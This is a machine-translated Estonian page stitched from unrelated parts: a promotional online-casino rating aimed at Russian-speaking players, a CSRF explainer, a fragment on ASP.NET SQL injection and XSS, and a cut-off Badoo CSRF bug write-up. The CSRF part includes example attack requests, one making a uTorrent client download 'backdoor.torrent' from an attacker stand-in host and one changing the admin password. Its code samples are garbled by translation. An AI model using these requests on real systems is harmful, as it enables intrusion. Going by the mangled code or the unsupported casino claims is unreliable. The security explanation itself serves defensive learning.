Usaldusväärsete ja ausate online -kasiinode leidmine võtab palju vaba aega, eriti kui tegemist on algajatega. On vaja hinnata mänguklubi läbipaistvust, selle mainet võrgus, teiste kasutajate ülevaateid, maksete kiirust ja paljusid muid tegevustegureid. Mängijate päästmiseks sellest saatusest oleme koostanud kasiino reiting , mis on põhjalikult testitud ja kinnitanud nende enda ausust ja mänguautomaatide head tootlust.

Meie edetabel parimate kasiinode kohta

Te ei pea enam kulutama isiklikku aega asutuse usaldusväärsuse kontrollimisele. Kogenud hasartmängude analüütikud, kes veedavad iga kuu kümneid tunde kasiinodes, on andnud oma objektiivse hinnangu hasartmänguklubide tööle. Nad analüüsisid sadu ettevõtteid, et lõpuks pakkuda kasutajatele parimaid platvorme Internetis.

Esialgne klubide nimekiri oli üsna suur, kuid analüüsi käigus kadusid kahtlased ja ebausaldusväärsed asutused. Näiteks hoiatavad eksperdid võltslitsentsi olemasolu, teenindusaegade sertifikaatide puudumist, mänguautomaadi serveri asendamist ja palju muud. Isegi üks tegur, mis võimaldab kasiino aususes kahelda, on põhjus reitingust väljaarvamiseks.

Lisaks hasartmängude platvormide pealiskaudsele analüüsile kontrollitakse ka teavet asutuste kohta Internetis. Analüüsis võetakse arvesse veebipõhist mainet, praeguste ja endiste mängijate ülevaateid, konfliktsituatsioonide olemasolu, skandaale kasiinodega ja loojate probleemide lahendamise viise. Erilist tähelepanu pööratakse noortele klubidele, kelle töökogemus on kuni 1-2 aastat.

Kuidas kasiinoreiting koostatakse ja kes sinna jõuab?

Loomise eest litsentseeritud kasiinode reitingMe meelitame kohale kogenud mängureid ja analüütikud, kellel on üle 10 -aastane töökogemus. Tänu oma teadmistele saavad nad hõlpsasti välja petetud klubid välja juurida ja seejärel ülejäänud asutused põhjalikult analüüsida. Tulemuseks on väike nimekiri usaldusväärsetest kasiinodest, kus saate turvaliselt mängida, kartmata tulemuste aususe ja väljamaksete pärast.

• hasartmängude reguleerija litsentsi olemasolu ja registreerimiseks valitud jurisdiktsioon;
• platvormi turvalisus, mis tagab andmete ja makseteabe konfidentsiaalsuse;
• litsentsitud tarkvara valik usaldusväärsetelt pakkujatelt, kelle töösse on võimatu sekkuda;
• venekeelse versiooni kättesaadavus Venemaalt ja SRÜ riikidest pärit kasutajate mugavamaks muutmiseks;
• tugiteenus, sealhulgas selle töögraafik, reageerimiskiirus, probleemide lahendamise kvaliteet;
• raha väljavõtmine ilma täiendavate viivituste ja kontrollideta, samuti raha kättesaamise võimalused ja tehingute töötlemise kiirus;
• boonusprogrammid uutele ja tavakasutajatele, turniiride, loteriide, perioodiliste tutvustuste olemasolu;
• maksesüsteemid, mis mõjutavad klientide mugavust kontot täiendada ja võitu välja võtta.

See on vaid väike nimekiri tegelikest nõuetest, mida eksperdid hindavad. Iga kriteerium saab oma tähtsusfaktori, mida arvestatakse lõpptulemuse summeerimisel.

Mis on litsentseeritud kasiino?

Kasiino hinnang , mis annab tunnistust hasartmänguplatvormide töö aususest ja läbipaistvusest, võivad koosneda ainult asutustest, kellel on kehtivad tegevuslitsentsid. Juriidilised klubid peavad heakskiidu saamiseks läbima regulatiivse auditi ja täitma kõiki eeskirju.

Ainuüksi litsentsi mainimisest saidil ei piisa. Eksperdid mõistavad, et petturid saavad naiivsete kasutajate petmiseks kasutada logosid, seega analüüsivad nad teavet iseseisvalt. Selleks minge regulaatori ametlikule veebisaidile ja kinnitage teave dokumendi numbri või juriidilise isiku nime abil. Kui litsentsiteavet pole, on see võlts.

Analüütikud kasutavad tehnilist analüüsi ka litsentsitud tarkvara kontrollimiseks. Arendustööriistu kasutades saavad nad juurdepääsu andmeedastusserveri teabele. Kui kasiino kasutab tarkvara pakkuja ametlikku portaali, on tarkvara õiglane ja seaduslik. See tähendab, et te ei saa tema tööd segada ja lõpptulemusi muuta.

Kuidas määratakse kasiino õiglus?

Mänguklubi ausust, mis on seotud olemasolevate ressursside ja teadmiste hulgaga, on üsna raske iseseisvalt hinnata. Enne asutuste kaasamistaus kasiino hinnanganalüütikud kontrollivad põhjalikult paljusid tegureid:

• piirkonnad, kust mängijad võetakse, kuna keelatud jurisdiktsioonid räägivad palju;
• väljavõtmislimiidid, ühekordsete tehingute piiramine, samuti tehingute päeva-, nädala- ja igakuine summa;
• teabe kättesaadavus KYC ja AML kohta, mis näitab vastavust raha päritolu ausust ja seaduslikkust käsitlevate õigusaktide nõuetele;
• maine, mis kinnitab klubi ausust ja usaldusväärsust ning kõrgetasemeliste skandaalide või probleemide puudumist;
• töö kestus, mis võimaldab teil täielikult hinnata Interneti -ressursi ajalugu, sealhulgas kõiki eeliseid ja puudusi;
• regulaatori olemasolu ja selle eeskirjade järgimine, mis suurendab tegevuse õigluse võimalusi.

Litsents ja regulaator on üsna olulised kriteeriumid, kuid see ei taga 100% ausust. Sellisele tiitlile võivad loota ainult klubid, kes lubasid mängijatel saada suuri võite ja jackpotte, andsid loteriide ja turniiride jaoks kingitusi.

Mänguautomaatide sordid

Mänguautomaatide, masinate ja muude hasartmängude meelelahutuse arv ütleb institutsiooni kohta palju. Mõned klubid teevad koostööd vaid mõne tarkvara pakkujaga, kuid saavad neilt populaarseid ja uusi mängupakkumisi, teised aga laiendavad oma partnerluslepingute võrgustikku ja kutsuvad koostööd tegema tohutul hulgal kaubamärke. Mida rohkem masinaid mänguplatvormil esitatakse, seda lihtsam on kliendil endale meelepärane pesa valida.

Aga litsentseeritud kasiinode reitingvõtab arvesse mitte ainult mängude mitmekesisust, vaid ka nende kvaliteeti. Usaldusväärsed hasartmänguasutused kasutavad ainult litsentsitud tarkvara, mille ausus ja ohutus on testitud. Sellised masinad võimaldavad teil loota kuni 98%tootlusele ning te ei saa nende tööd segada ja tulemuste genereerimise algoritmi muuta.

Ausalt öeldes on kõik saidid suunatud kasumi teenimisele. Isegi kui üks mängijaist võidab jackpoti, jääb pikas perspektiivis asutus miinusesse. Kuid ainult ausad klubid võimaldavad kasutajatel saada suure jackpoti ja selle päris kontole välja võtta. See eristab litsentseeritud online -kasiinosid petturlikest projektidest.

Boonuspoliitika

Looge kasiino reiting see on võimatu ilma preemiapoliitikat arvestamata. Kõik mänguklubid kasutavad uute klientide meelitamiseks ja olemasolevate klientide säilitamiseks tutvustusi ja kingitusi. Kuid mõned ettevõtted käituvad üsna kavalalt, luues panustamiseks või tekkepõhisteks tingimusteks varjatud tingimused, seades ebareaalsed panustamistingimused vahemikku x60–100, mida on peaaegu võimatu täita.

Standardne stiimulite komplekt koosneb järgmistest kategooriatest:

1. Uute klientide vastuvõtmisel sissemakseboonus puudub - krediteeritakse e -posti aadressi ja telefoninumbri kinnitamise eest. Tasuna kasutatakse tasuta raha või tasuta keerutusi mänguautomaatidel, millel on kohustuslik läbimängimisnõue.
2. Registreerimiskink - tasuta keerutused või 1-5 sissemakse konto täiendamise summa kordajad alates isikliku profiili loomisest. Boonuse täpse suuruse ja maksimaalsed limiidid määrab iga klubi individuaalselt.
3. Lojaalsusprogramm - mitmesugused kasutajate olekute süsteemid, mis mõjutavad iganädalase raha tagasimakse suurust, isiklike teenusetingimuste kättesaadavust, üksikuid kingitusi, kohaliku valuuta soodsat raha vahetuskurssi ja palju muud.
4. Sooduskoodid on hasartmänguklubide perioodilised reklaamid, mis annavad kõigile tasuta keerutuste jaoks kinkekaarte, sissemakseid või konto kordajaid.

Venekeelsed kasiinod

Meikimine parimate kasiinode reiting aastal 2020, võetakse arvesse vene keele olemasolu platvormil. Venekeelne liides võimaldab Venemaalt, Valgevenest, Ukrainast ja SRÜ riikidest pärit kasutajatel hõlpsasti tegeleda registreerimise, sisselogimise, konto täiendamise ja muude platvormi funktsioonidega. Samuti kinnitab see, et asutus on keskendunud venekeelsetele kasutajatele, pakkudes neile ainulaadseid boonuseid ja tuge.

Arvesse võetakse tugiteenistuse tööd. Enamik hasartmänguklubisid osutab klientidele abi ainult inglise keeles, mis muudab suhtlusprotsessi keerulisemaks. Taotluse koostamiseks ja tugivastuse mõistmiseks peate kasutama tõlkijat või võtma ühendust asjatundlike inimestega. Seetõttu hõlmab reiting ainult neid veebiklubisid, mis nõustavad kliente tugivestlustes ja telefoni teel vene keeles.

Kasiino venekeelne liides võimaldab teil hõlpsasti mõista platvormi kasutajareegleid, uurida boonuspakkumisi ja nende tekkepõhiseid omadusi, panustamist, osaleda turniiridel ja loteriidel, kahtlemata toimingute õigsuses.

Kasiinod kiire raha väljavõtmiseks

Erilist tähelepanu pööratakse online -kasiinodes maksete kiirusele. Mõned klubid pakuvad pangakaartidele ja e-rahakottidele raha väljavõtmist mõne tunni jooksul ning VIP-klientide jaoks töötlevad nad taotlusi koheselt. Teised kasutavad taotluste käsitsi töötlemist tööpäevadel vastavalt spetsiaalsele ajakavale, mistõttu võib makseid viivitada kuni 1-3 tööpäeva alates taotluse esitamise kuupäevast. Kasutajate säästmiseks pikkade ooteaegade eest loodikasiino reiting kiire väljavõtmisega.

See koosneb eranditult nendest asutustest, kes kaaluvad kõik taotlused kiiresti läbi ega loo takistusi raha saamisel. Arvesse võetakse mitte ainult ülekannete kiirust, vaid ka probleemide puudumist suurte maksete või rahaülekannete taotlemisel pärast jackpoti, suure jackpoti võitmist. Ainult ausad asutused saavad tagada õiglased maksed ja probleeme maksetega.

Samuti analüüsitakse olemasolevaid hoiuste ja raha taotlemise maksesüsteeme. Tavalised saidid toetavad minimaalset arvu viise, kuid progressiivsed klubid analüüsivad pidevalt trende, et integreerida uusi tehnilisi lahendusi.

Peamised maksesüsteemid online -kasiinodes:

• pangakaardid MIR, MasterCard, Visa;
• elektroonilised rahakotid QIWI, Yandex, Webmoney, Neteller, Skrill jt;
• mobiilimaksed Beeline, MegaFon, MTS, TELE2;
• Venemaa Interneti -pangandus;
• populaarsed krüptovaluutad, sealhulgas Bitcoin, Ethereum, Litecoin.

Klienditugi

Oluline tegur, mida loomisel arvesse võetiaus kasiino hinnang- klienditoe kättesaadavus ja selle töö kvaliteet. Usaldusväärsed ettevõtted hoolitsevad oma kliendibaasi eest, seetõttu korraldavad nad spetsiaalseid telefoniliine ja veebivestlusi, et kasutajate küsimustele kiiresti vastata ja nende probleeme lahendada.

Analüütikud kasutasid toe analüüsimiseks telefoniliine, otsevestlusi ja e -posti kontakte. Erinevatel kellaaegadel said saidi töötajad mitmesuguseid küsimusi või taotlusi tehniliste probleemide lahendamiseks. Pärast seda hinnati nende töö kvaliteeti, mis hõlmas järgmisi tegureid:

• vastuste esitamise kiirus;
• kas konsultant lahendab probleemi ja kui kaua see aega võttis;
• vastuste kirjaoskus ja venekeelsete töötajate kättesaadavus toetuseks.

Kui kasiinol pole venekeelseid operaatoreid, soovitame konsultantide küsimuste ja vastuste tõlkimiseks kasutada Google'i veebitõlkijat.

järeldused

Enne veebiklubis registreerumist peate analüüsima selle töö usaldusväärsust, läbipaistvust, samuti kontrollima võrgus olevat mainet ja arvustusi. Selle asemel soovitame kasutadaaus kasiino hinnangkogenud mängurite koostatud. Oma kogemuse kaudu lükkasid nad tagasi kümned kahtlased hasartmänguklubid, jättes nimekirja 2020. aasta parimate ettevõtete nimekirja.

Saitidevahelise võltsimise taotlus tuntud ka kui ühe klõpsuga rünnak või sõidusessioon ja lühendatud CSRF(mõnikord hääldatakse tõusulaine) või XSRF, on pahavara tüüp, mida kasutatakse veebisaidilt, kus veebirakendus usaldab kasutajalt volitamata käske. Pahatahtlik veebisait saab selliseid käske edastada mitmel viisil; näiteks spetsiaalselt loodud pildimärgendid, peidetud vormid ja JavaScripti XMLHttpRequests võivad kõik toimida ilma kasutaja suhtluseta või isegi teadmata. Erinevalt saidiülesest skriptimisest (XSS), mis kasutab kasutaja usaldust konkreetse saidi vastu, kasutab CSRF seda usaldust, mis saidil on kasutaja brauseris.

ajalugu

CSRFi haavatavused on teada ja neid on mõnel juhul kasutatud alates 2001. aastast. Kuna IP -aadress on antud kasutajalt, ei pruugi mõned veebisaitide logid CSRF -tõendeid omada. Kasutusest on vähemalt avalikult vähe teatatud ja 2007. aasta seisuga oli mitmeid hästi dokumenteeritud näiteid:

• Netflixi veebisaidil 2006. aastal oli arvukalt CSRF -i haavatavusi, mis võimaldasid ründajal sooritada selliseid toiminguid nagu DVD lisamine ohvri laenutusjärjekorda, konto tarneaadressi muutmine või ohvri sisselogimisandmete muutmine konto täielikuks kahjustamiseks.
• Internetipanga veebirakendus ING Direct oli haavatav CSRF -i rünnakute suhtes, mis võimaldas ebaseaduslikke rahaülekandeid.
• Populaarne videosait YouTube oli 2008. aastal CSRF -i suhtes haavatav ja see võimaldas igal ründajal sooritada praktiliselt kõiki kasutaja toiminguid.
• McAfee on ka haavatav CSRF -i suhtes, võimaldades ründajatel oma ettevõtte süsteemi muuta.

2018. aastal korraldati uusi rünnakuid veebiseadmete vastu, sealhulgas üritati muuta ruuterite DNS -seadeid. Mitu ruuteritootjat andis turvalisuse parandamiseks kiiruga välja püsivara värskenduse ja soovitas kasutajal riski vähendamiseks ruuteri seadeid muuta. Üksikasju pole avaldatud, viidates "ilmsetele turvakaalutlustele".

Näide ja omadused

Ründajad, kes leiavad sihtlehelt reprodutseeritava lingi, mis sooritab konkreetse toimingu, samal ajal kui ohver registreerub, saavad sellise lingi oma juhitavale lehele kinnistada ja meelitada ohvri selle avama. Ründekandja lingi saab paigutada kohta, mida ohver tõenäoliselt külastab, sisenedes sihtkohta (näiteks foorumi arutelule), või saata HTML -i meili sisu või manusena. Tegelik CSRF-i haavatavus Utorrentis (CVE-2008-6586) kasutas ära asjaolu, et selle veebikonsool on saadaval kohalikus hostis: 8080 võimaldas kriitilisi toiminguid teha lihtsa GET-päringu abil:

Sundfaile .torrent alla laadima = setetting & s = webui.parool & v = eviladmin

Rünnakud käivitati, postitades foorumitesse pahatahtlikke, automaatseid HTML -pildielemente ja rämpsposti, nii et neid lehti külastavad brauserid avavad need automaatselt ilma kasutaja eriliste toiminguteta. Inimesed, kes käitavad Utorrenti haavatavat versiooni samal ajal neid lehti avades, on rünnaku suhtes haavatavad.

CSRF -rünnakuid pildimärgendite abil tehakse sageli veebifoorumitest, kus kasutajad saavad pilte postitada, kuid mitte JavaScripti, näiteks BBCode abil:

Http: // localhost: 8080 /gui /? Action = add-url & s = http: //evil.example.com/backdoor.torrent

Juurdepääsul ründelinkile kohalikus Utorrenti rakenduses localhost: 8080 saadab brauser alati automaatselt ka kõik selle domeeni olemasolevad küpsised. See veebibrauserite ühine vara võimaldab CSRF -i rünnakutel kasutada nende sihitud haavatavusi ja teha vaenulikke toiminguid seni, kuni kasutaja on rünnaku ajal sisse logitud sihtveebilehele (antud näites kohalik Utorrenti veebiliides).

Saitidevaheline võltsingutaotlus on segane puhverserveri rünnak veebibrauseri vastu.

CSRF -il on tavaliselt järgmised omadused:

• See hõlmab saite, mis toetuvad kasutaja identiteedile.
• See kasutab saidi usaldust selle identiteedi vastu.
• See petab kasutaja brauseri saatma HTTP -päringuid sihtkohta.
• See sisaldab HTTP -päringuid, millel on kõrvaltoimed.

HTTP tegusõnad ja CSRF

• HTTP GET -is on CSRF -i kasutamine tühine, kasutades ülalkirjeldatud tehnikaid, nagu lihtne hüperlink, mis sisaldab manipuleeritud parameetreid ja laaditakse automaatselt IMG -märgendi abil. Vastavalt HTTP spetsifikatsioonile tuleks aga GET -i kasutada turvalise meetodina, see tähendab, et ei muudeta oluliselt rakenduse kasutaja olekut. Selliste toimingute jaoks GET -i kasutavad rakendused peaksid lülituma HTTP POST -ile või kasutama CSRF -kaitset.
• HTTP POSTil on CSRF -i jaoks erinevad haavatavused, sõltuvalt üksikasjalikest kasutusstsenaariumidest:
  • Lihtsaimal kujul, POST koos päringustringina kodeeritud andmetega (väli1 = väärtus1 ja väli2 = väärtus2) CSRF-rünnakud on lihtsa HTML-vormi abil hõlpsasti rakendatavad ja tuleb rakendada CSRF-vastaseid meetmeid.
  • Kui andmed saadetakse mõnes muus vormingus (JSON, XML), on standardmeetodiks POST -päringu väljastamine, kasutades XMLHttpRequest koos CSRF -i rünnakutega, mida takistab SOP ja; on olemas meetod suvalise sisu esitamiseks lihtsast HTML -vormist, kasutades atribuuti ENCTYPE; sellist võltspäringut saab eristada seaduslikust teksti / tavalise sisu tüübi järgi, kuid kui seda serveris ei täideta, saab CSRF -i täita
• muid HTTP meetodeid (PUT, DELETE jne) saab väljastada ainult XMLHttpRequest abil koos SOP ja CSRF ennetamisega; Need meetmed ei ole aga aktiivsed veebisaitidel, mis need selgesõnaliselt keelavad, kasutades Access-Control-Allow-Origin: * päist

Muud lähenemisviisid CSRF -ile

Lisaks, kuigi seda kirjeldatakse tavaliselt staatilise rünnakutüübina, saab CSRF-i dünaamiliselt üles ehitada ka saidiüleste rünnakustsenaariumide kasuliku koormuse osana, nagu on näidanud Samy uss, või ehitada lennult välja seansi teabe kaudu, mis on lekkinud saidi sisu. ja saadetakse sihtmärgile pahatahtliku URL -ina. CSRF-märke võib ründajaklient saata ka seansi fikseerimise või muude haavatavuste tõttu või arvata ära toore jõuga rünnaku abil, mis on tõlgitud pahatahtlikule lehele, mis genereerib tuhandeid ebaõnnestunud taotlusi. Rünnakuklassi "Dünaamiline CSRF" või iga kliendi kasuliku koormuse kasutamist konkreetse võltsimisseansi jaoks kirjeldasid 2009. aastal Nathan Hamiel ja Sean Moyer BlackHati briifingutel, kuigi taksonoomia on veel laiemat rakendust saavutamas.

Oren Ofer esitles OWASP peatüki kohalikul koosolekul jaanuaris 2012 uut vektorit dünaamiliste CSRF -rünnakute koostamiseks - "AJAX Hammer - Dynamic CSRF".

Efektid

Välja on antud tõsidusmõõdikud CSRF -i turvaaukude kohta, mis viivad koodi kaugkäivitamiseni koos superkasutaja õigustega, ning turvaauk, mis võib kahjustada juursertifikaati, mis avaliku võtme infrastruktuuri täielikult õõnestada.

Piirangud

Saitidevahelise võltsingutaotluse edukaks toimimiseks peab toimuma mitu asja:

1. Ründaja peab sihtima kas saiti, mis ei kinnita viitaja päist või ohvrit brauseri abil, või pistikprogrammi, mis lubab viitajat võltsida.
2. Ründaja peab sihtlehelt leidma esitusvormi või URL -i, millel on kõrvalmõjud, mis teevad midagi (näiteks raha ülekandmine või ohvri e -posti aadressi või parooli muutmine).
3. Ründaja peab kindlaks määrama kõikide vormide või URL -i sisendite õiged väärtused; kui mõni neist peaks olema salajane autentimisväärtus või identifikaator, mida ründaja ei oska arvata, siis rünnak suure tõenäosusega ebaõnnestus (välja arvatud juhul, kui ründajal vedas neid ära arvata).
4. Ründaja peab meelitama ohvri pahatahtliku koodiga veebilehele, samal ajal kui ohver registreerub sihtlehel.

Rünnak on pime: ründaja ei näe, mida sihtsait võltsitud taotlustele vastates ohvrile tagasi saadab, välja arvatud juhul, kui ta kasutab saidiülest skripti või muud viga saidil. Lisaks saab ründaja sihtida mis tahes linki või esitada mis tahes vorme, mis tulevad pärast esialgset võltsitud taotlust, kui need järgnevad lingid või vormid on sarnaselt etteaimatavad. (Mitmeid sihtmärke saab modelleerida, lisades lehele mitu pilti või kasutades JavaScripti, et tuua klikkide vahel viivitus.)

Neid piiranguid arvestades võib ründajal tekkida raskusi ohvri anonüümse või haavatava esildise leidmisega. Teisest küljest on rünnakukatsed hõlpsasti kokkupandavad ja ohvritele nähtamatud ning rakenduste arendajad on CS -rünnakuteks vähem tuttavad ja valmis kui näiteks sõnastike rünnakutest paroolide lõhkumiseks.

ärahoidmine

Enamik CSRF -i ennetusmeetodeid süstib päringutesse täiendavaid autentimisandmeid, võimaldades veebirakendusel tuvastada volitamata asukohtade päringuid.

Sünkronisaatori markeri mudel

• Sisselogimisel määrab veebirakendus küpsise, mis sisaldab juhuslikku märki, mis jääb kogu kasutaja seansi jooksul muutumatuks

Komplekti küpsis: Csrf-token = i8XNjC4b8KVok4uw5RftR38Wgp2BFwql; aegub = neljapäev, 23. juuli 2015 10:25:33 GMT; Maksimaalne vanus = 31449600; Tee = /

• JavaScript töötab kliendi poolel, loeb väärtuse ja kopeerib selle iga tehingutaotlusega saadetud kohandatud HTTP päisesse

X-Csrf-märk: i8XNjC4b8KVok4uw5RftR38Wgp2BFwql

• Server kontrollib märkide olemasolu ja terviklikkust

Selle meetodi ohutus põhineb eeldusel, et ainult sama päritoluga JavaScript suudab küpsise tähendust lugeda. JavaScript töötab petturitest failidega või e -postiga ei saa kohandatud päist lugeda ega kopeerida. Isegi kui CSRF -i märk küpsised saadetakse automaatselt petturitest, server ootab siiski kehtivat X-CSRF-i luba rubriiki .

CSRF -i märk ise peab olema ainulaadne ja ettearvamatu. Seda saab genereerida juhuslikult või tuletada seansimärkidest, kasutades HMAC -i:

Csrf_token = HMAC (seansi_süsteem, rakenduse_saladus)

CS -küpsiste markeril ei tohiks olla lippu HTTPOnly, kuna see on mõeldud lugemiseks JavaScripti kujunduse abil.

Seda tehnikat rakendavad paljud kaasaegsed raamistikud nagu Django ja AngularJS. Kuna žetoon jääb kogu kasutaja seansi ajal konstantseks, töötab see hästi AJAX -i rakendustega, kuid ei paku veebirakendustes sündmuste jada.

Selle meetodi pakutavat kaitset võib ohustada veebisaidi sihtmärk katkestab ühenduse oma päritolupoliitikat, kasutades ühte järgmistest meetoditest:

• Lubatud juurdepääsu-juhtimise-lubamise päritolu päis (argumendi tärniga)
• clientaccesspolicy.xml fail, mis annab soovimatu juurdepääsu Silverlighti juhtelemendile
• crossdomain.xml fail, mis pakub tahtmatut juurdepääsu flash -filmidele

Topeltküpsis

Sarnaselt küpsise-päise lähenemisviisiga, kuid ilma JavaScripti kasutamiseta saab sait seadistada CSRF-i märgi küpsiseks ja sisestada selle ka iga kliendi saadetud HTML-vormi varjatud väljale. Vormi esitamisel saab sait kontrollida, kas küpsise marker vastab markerite kujule. Üldine päritolupoliitika takistab ründajal sihtdomeeni küpsiste lugemist või seadistamist, seega ei saa nad genereeritud kujul õiget märki esitada.

Selle meetodi eeliseks sünkroonimismustri ees on see, et märki ei pea serverisse salvestama.

Kliendi garantiid

Brauserilaiendid, näiteks RequestPolicy (Mozilla Firefoxi jaoks) või Umatrix (nii Firefoxi kui ka Google Chrome'i / Chromiumi puhul) võivad CSRF-i ära hoida, pakkudes saidiüleste päringute jaoks vaikimisi keelamispoliitika. See võib aga oluliselt häirida paljude saitide normaalset toimimist. CsFire'i laiendus (ka Firefoxi jaoks) võib vähendada CSRF-i mõju, vähendades tavapärasele sirvimisele vähem mõju, eemaldades autentimisteabe saitidevahelistest päringutest.

ASP.NET MVC pole just kõige suurem hype, kuid veebiarendajate seas üsna populaarne. (Häkkerivastase) vaatevinklist pakub selle standardfunktsioon teile mõningast elementaarset turvalisust, kuid valdava enamuse häkkeritrikkide eest kaitsmiseks on vaja lisakaitset. Selles artiklis käsitleme põhitõdesid, mida ASP.NET -i arendaja (olgu see siis Core, MVC, MVC Razor või veebivormid) peaks turvalisusest teadma.

Alustame kõigi teadaolevate rünnakutüüpidega.

SQL -i süstimine

Kummaline küll, kuid 2017. aastal on süstimine ja eelkõige SQL-i süstimine esikohal "Top-10 OWASP turvariskide" (Open Web Application Security Project) seas. Seda tüüpi rünnak tähendab, et kasutaja sisestatud andmeid kasutatakse serveripoolsel päringuparameetritena.

Klassikalise SQL -i sisestamise näide on Web Formsi rakenduste jaoks tüüpilisem. Parameetrite kasutamine päringuväärtustena aitab kaitsta rünnakute eest:

String commandText = "UPDATE Users SET Status = 1 WHERE CustomerID = @ID;"; SqlCommand käsk = new SqlCommand (commandText, connectionString); command.Parameters ["@ ID"]. Väärtus = kliendiID;

Kui arendate MVC -rakendust, katab olemiraamistik mõned haavatavused. MVC / EF rakenduses töötava SQL -i süstimise saamiseks peate välja mõtlema. See on aga võimalik, kui käivitate SQL -i ExecuteQuery abil või helistate halvasti kirjutatud salvestatud protseduuridele.

Kuigi ORM väldib SQL -i sisestamist (välja arvatud ülaltoodud näited), on soovitatav piirata atribuudid väärtustega, mida modelleerivad väljad ja seega ka vormid. Näiteks kui eeldatakse, et väljale saab sisestada ainult teksti, kasutage vahemiku ^ + $ määramiseks parameetrit Regex. Ja kui väljale tuleb sisestada numbrid, märkige see nõudena:

Avalik string Zip (saada; seada;)

Veebivormides saate väärtusi piirata, kasutades valideerijaid. Näide:

Kuna .NET 4.5 veebivormid kasutavad märkamatut valideerimist. See tähendab, et te ei pea vormi väärtuse kinnitamiseks lisakoodi kirjutama.

Eelkõige võib andmete valideerimine aidata kaitsta teise tuntud haavatavuse eest, mida nimetatakse saidiüleseks skriptimiseks (XSS).

XSS

Tüüpiline XSS -i näide on skripti lisamine kommentaarile või külalisteraamatu kirjele. See võib välja näha järgmine:

Nagu võite ette kujutada, edastatakse selles näites teie saidi küpsised parameetrina mõnele häkkeriressursile.

Veebivormides saate järgmise koodiga vea teha:

vabandust<%= username %>aga parool on vale

On selge, et kasutajanime asemel võib olla skript. Skripti täitmise vältimiseks võite kasutada vähemalt mõnda muud ASP.NET -avaldist: see kodeerib selle sisu.

Kui kasutame Razorit, kodeeritakse stringid automaatselt, mis minimeerib XSS -i rakendamise võimaluse - häkker saab selle eemaldada ainult siis, kui teete ränga vea, näiteks kasutage @ Html.Raw (Model.username) või kasutage mudelis stringi asemel MvcHtmlString.

Täiendavaks kaitseks XSS -i vastu on andmed kodeeritud ka C # -koodi. NET Core'is saate System.Text.Encodings.Web nimeruumi kasutada järgmisi kodeerijaid: HtmlEncoder, JavaScriptEncoder ja UrlEncoder.

Järgmine näide tagastab stringi 6 7 8

Põhimõtteliselt esitasid ohver lehe laadimisel taotluse Badoo skriptile, võtsid selle kasutaja jaoks rt parameetri ja esitasid seejärel ohvri nimel taotluse. Antud juhul oli tegemist Mahmoudi konto linkimisega ohvri kontoga, mis võimaldas konto täielikult üle võtta.

järeldused

Kus suitsu, seal tuld.Mahmoud märkas siin, et rt parameeter tagastati erinevates kohtades, konkreetsetes json -vastustes. Nii eeldas ta õigesti, et seda võidakse kuskil näidata, kus seda saab sel juhul js -failis kasutada.

Tulemused

CSRF -i rünnakud kujutavad endast rünnakute jaoks teist ohtlikku vektorit ja neid saab läbi viia ilma ohvri aktiivse tegevuseta või isegi ilma tema teatamiseta. CSRFi haavatavuste leidmine nõuab teatavat leidlikkust ja jällegi valmisolekut kõike testida.

Tavaliselt kaitstakse vorme vaikimisi selliste raamistikega nagu Rails, kui sait esitab POST -päringu, kuid API -sid saab

olgu omaette lugu. Näiteks Shopify on kirjutatud peamiselt Ruby on Rails raamistiku alusel, mis pakub vaikimisi CSRF -i kaitset kõikidele vormidele (kuigi selle saab keelata). Siiski on selge, et selle raamistikuga loodud API -de puhul pole see tingimata nii. Lõpuks pöörake tähelepanu kõnedele, mis muudavad serveri andmeid (nt kustutamistoiming) ja tehakse GET -päringu abil.